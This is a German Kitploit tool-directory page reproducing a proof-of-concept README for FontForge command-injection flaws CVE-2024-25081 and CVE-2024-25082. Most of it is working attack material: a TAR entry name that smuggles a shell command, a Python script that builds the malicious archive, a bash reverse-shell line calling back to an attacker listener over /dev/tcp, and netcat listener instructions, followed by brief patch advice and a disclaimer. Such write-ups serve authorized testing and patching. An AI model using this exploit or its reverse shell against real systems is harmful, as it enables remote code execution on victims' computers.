Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-25082_CVE-2024-25081 — FontForge Splinefont präparierte Dateiname Befehlseinschleusung Schwachstelle | Kitploit
Tools/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

FontForge Splinefont präparierte Dateiname Befehlseinschleusung Schwachstelle

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

⚠️ FontForge RCE — CVE-2024-25081 & CVE-2024-25082 - PoC

📖 Überblick

Proof-of-concept-Exploit für zwei Befehlseinschleusungssicherheitslücken in FontForge ≤ 20230101 (Splinefont Komponente).

CVEVektorAuslöser
CVE-2024-25081Manipulierter DateinameDirektes Dateiöffnen
CVE-2024-25082Manipulierter ArchivdateinameTAR/ZIP/GZ/BZ2-Extraktion

Dieser PoC zielt auf CVE-2024-25082 — FontForge's automatische Archivextraktion übergibt Dateinamen ohne Bereinigung an eine Shell, wodurch ein Semikolon-getrennter Payload, der in einem TAR-Eintragsnamen eingebettet ist, beliebige Befehle ausführen kann.


So funktioniert es

FontForge unterstützt das direkte Öffnen von Schriftartdateien aus Archiven. Beim Extrahieren eines TAR-Archivs erstellt die Splinefont-Komponente einen Shell-Befehl unter Verwendung des Dateinamens aus dem Archiveintrag. Da der Dateiname nicht bereinigt wird, bricht ein Semikolon (;) im Eintragsnamen aus dem erwarteten Befehl aus und schleust beliebige Shell-Anweisungen ein.

Bösartiger TAR-Eintragsname:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Wenn FontForge dieses Archiv verarbeitet, interpretiert die Shell dies wie folgt:

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

Umgebung

  • Angreifbare Software: FontForge ≤ 20230101
  • Plattform: Linux
  • Angreifer-Listener: 192.168.1.20:4444 (nach Bedarf anpassen)

📋 Voraussetzungen

  • Python 3 (nur Standardbibliothek, tarfile Modul)
  • netcat auf dem Angreifer-Rechner
  • FontForge ≤ 20230101 auf dem Zielrechner

🛠️ Proof of Concept

1. Starten Sie einen netcat-Listener auf Ihrem Angreifer-Rechner

root@kitploit:~
nc -lvnp 4444

2. Erstellen Sie das bösartige TAR-Archiv

root@kitploit:~
# Schreibe den Reverse-Shell-Payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Erstelle das bösartige Archiv
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Öffnen Sie das Archiv in FontForge auf dem Ziel

root@kitploit:~
fontforge exploit.tar

Eine Reverse-Shell wird sich mit Ihrem Listener verbinden.


🔒 Patch

Behoben in FontForge nach 20230101 via PR #5367. Aktualisieren Sie auf die neueste Version.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • Manuelle Erstellung: Holen Sie die neueste Version von fontforge/fontforge

🔍 Referenzen

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • FontForge fix PR #5367

⚖️ Haftungsausschluss und Bedingungen

Dieser Proof-of-Concept (PoC)-Code wird ausschließlich für Bildungs- und autorisierte Penetrationstestzwecke bereitgestellt.

  • Es wird keine Erlaubnis erteilt, diesen Code für andere Zwecke zu modifizieren, weiterzuverbreiten oder zu verwenden.
  • Unautorisierte Nutzung oder Modifikation kann illegal und unethisch sein.
  • Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden.
Tool herunterladen